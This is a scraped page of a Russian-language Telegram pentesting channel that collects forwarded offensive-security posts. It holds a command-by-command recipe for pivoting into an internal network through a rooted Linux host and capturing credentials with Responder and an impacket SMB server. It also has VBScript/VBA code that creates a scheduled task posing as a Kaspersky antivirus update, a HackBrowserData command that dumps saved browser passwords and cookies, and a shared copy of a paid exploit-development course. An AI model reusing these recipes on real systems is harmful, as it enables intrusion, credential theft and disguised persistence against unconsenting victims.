Pentester`s Notes – Telegram
Pentester`s Notes
188 subscribers
47 photos
2 videos
31 files
136 links
Download Telegram
Forwarded from -_-
ReadytoRun stomping прогугли
И в lnk завернёшь
1
Forwarded from Zeebra
https://shorsec.io/blog/malrdp-implementing-rouge-rdp-manually/
Вот это неплохой вариант, чуть сложнее чем с lnk нагрузками
1
Forwarded from Shmelev Jaroslav
В общем, вот рецепт для тех кто хочет SSH Nightmare:
Вводные - нужен доступ к Linux-хосту от root, PermitTunnel yes и два сетевых интерфейса на машине (можно и через один, но есть риск DoS при ошибках в конфигурации). В примере рассмотрим ситуацию когда есть внешний интерфейс eth0 и интерфейс в атакуемую сеть (eth1, 10.0.0.0/24).
1) Делаем туннель:
sudo ssh -i ~/.ssh/id_rsa -o Tunnel=ethernet -w 1:1 root@<linux>
2) На локальной машине включаем интерфейс и выбираем свободный адрес в изолированной сети:
sudo ip link set tap1 up
sudo ip addr add 10.0.0.4/24 dev tap1
3) На удаленной машине делаем сетевой мост и назначаем ему адрес от интерфейса eth1:
sudo brctl addbr bridgeforattack
sudo brctl addif bridgeforattack tap1
sudo brctl addif bridgeforattack eth1
sudo ip addr del 10.0.0.2/24 dev eth1
sudo ip addr add 10.0.0.2/24 dev bridgeforattack
sudo ip link set dev tap1 up
sudo ip link set dev bridgeforattack up
Для случая с 1 интерфейсом после смены IP обязательно нужно прописать дефолтный роут, например:
sudo ip route add default via 10.0.2.1
4) Проверяем L2-доступ к сети с локальной машины:
ping -c1 10.0.0.1
5) Готовим атаку: спуфим респондером с отключенным SMB, а соединение принимаем на smbserver из impacket (респондер тоже их ловит, но часто дропает коннекты хз почему)
sudo responder -I tap1
smbserver.py -smb2support share .
6) ???

7) PROFIT!
Forwarded from Похек (Sergey Zybnev)
⚡️ Подборка ресурсов для изучения кибербеза
#подборка #awesome

➡️ Меня довольно часто спрашивают, что где почитать, где практиковаться, как начать зарабатывать. Считаю я закрыл данные вопросы надолго.

1️⃣ Видео
John Hammond
STÖK
LiveOverflow
The XSS rat
Sathvik Techtuber
Guided Hacking
NetworkChuck
Grant Collins
Positive Events
OFFZONE MOSCOW
PwnFunction
DEFCONConference
David Bombal

2️⃣ Теория
HackTricks
PayloadsAllTheThings
Xakep
Poxek
PortSwigger
SecurityLab
Codeby
Awesome DevSecOps
iOS Security Awesome
Android Security Awesome
Personal Security Checklist
RedTeam Tools
OWASP Cheat Sheet Series
six2dez pentest-book
Awesome Bugbounty Writeups
Blog INTIGRITI
PentesterLand Writeups
Pentesting AD mindmap
Conference slides

3️⃣ Практика
TryHackMe
HackTheBox
VulnHub
GoAD
Exploit-DB
PortSwigger Academy
bWAPP
WebGoat
OWASP Juice Shop
FVWA
Root-Me
OverTheWire
Crackmes
Atomic Red Team
Codeby Games
Standoff КиберПолигон

4️⃣ Заработок
HH
Хабр Карьера
BI.ZONE Bug Bounty
StandOff Bug Bounty
Yandex Bug Bounty
BUG BOUNTY RU

➡️ Также вы можете пользоваться различными нейросетями, но учитывайте, что ответы не всегда могут быть правдивые.

➡️ @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Hack IT Easy
EXP-301-2022(OSED).pdf
8.6 MB
EXP-301-2022 💻❗️

Для всех, кто спрашивал про EXP-301 - пожалуйста)
Буду рад, если кто-то поделится мнением после изучения😊

P.S. Видео тоже есть, если будет много желающих - загружу
Forwarded from Хакер — Xakep.RU
Магия SSPI. Достаем учетные данные Windows, не трогая LSASS #статьи #подписчикам

Windows позволяет разработчикам создавать шифрованные каналы связи, подписывать сообщения между клиентом и службой, аутентифицировать клиента на службе. Злоупотребляя этими возможностями, мы можем извлекать учетные данные пользователя без взаимодействия с LSASS. В этой статье я продемонстрирую, как это работает.

https://xakep.ru/2023/12/08/sspi-hack/
🔥1
Forwarded from Миша
а что значит тихое?

но вообще вот код.

Set service = CreateObject("Schedule.Service")
Call service.Connect
Dim td: Set td = service.NewTask(0)
td.RegistrationInfo.Author = "Kaspersky Corporation"
td.settings.StartWhenAvailable = True
td.settings.Hidden = False
Dim triggers: Set triggers = td.triggers
Dim trigger: Set trigger = triggers.Create(1)
Dim startTime: ts = DateAdd("s", 30, Now)
startTime = Year(ts) & "-" & Right(Month(ts), 2) & "-" & Right(Day(ts), 2) & "T" & Right(Hour(ts), 2) & ":" & Right(Minute(ts), 2) & ":" & Right(Second(ts), 2)
trigger.StartBoundary = startTime
trigger.ID = "TimeTriggerId"
Dim Action: Set Action = td.Actions.Create(0)
Action.Path = "C:\Windows\System32\cmd.exe"
Action.Arguments = "/c whoami"
Call service.GetFolder("\").RegisterTaskDefinition("AVUpdateTask", td, 6, , , 3)
Forwarded from Миша
хм, а если вот так как-нибудь?

Sub CreateScheduledTask()
Dim shell As Object
Dim TaskName As String
Dim Command As String
Dim RunTime As String
TaskName = "MyCmdTask"

Command = "cmd.exe"

RunTime = "*/10 * * * *"

Set shell = CreateObject("WScript.Shell")

shell.Run "schtasks /Create /SC MINUTE /MO 10 /TN """ & TaskName & """ /TR " & Command, , True

Set shell = Nothing

End Sub
Forwarded from Offensive Xwitter
😈 [ LuemmelSec @theluemmel ]

One Box To Rule Them All

Little write up of my way to tackle remote pentesting situations with a dropbox.

This is about non covert systems that will allow you to carry out full fledged pentests when implanted into the customers network.

🔗 https://luemmelsec.github.io/One-Box-To-Rule-Them-All/

🐥 [ tweet ]
Forwarded from Cybred
https://docs.google.com/spreadsheets/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8

Таблица, отдельные скриншоты которой гуляют по разным чатам. Рекомендуемые коробки для подготовки к сдаче экзаменов от OffSec: PEN-200 (OSCP), PEN-300 (OSEP) и WEB-300 (OSWE).

И актуальная (последнее видео вышло 11 дней назад) серия видео с развертыванием и решением похожей локальной лаборатории: OSCP Practice Lab: Active Directory Attack Path #1, #2, #3.
Forwarded from Cybred
https://github.com/moonD4rk/HackBrowserData

HackBrowserData это инструмент командной строки, который умеет расшифровывать и экспортировать данных из 18 браузеров на Windows, MacOS и Linux.

Извлекаемые данные:
— сохраненные пароли
— история браузера
куки пользователя
кредитные карты
история скачиваний
список расширений
localStorage
закладки

Пример использования:
hack-browser-data.exe -b chrome -f json -dir results -cc


На замену SharpChromium.
Pentester`s Notes pinned «https://habr.com/ru/companies/angarasecurity/articles/680138/»
Forwarded from hidden account
Коллеги, собрал все известные мне внешние обработки для исполнения кода в 1с. Бывает, что одна работает, другая нет. И наоборот
#1c #1с #rce
Forwarded from hidden account
Для 1с_rce нужно код вставить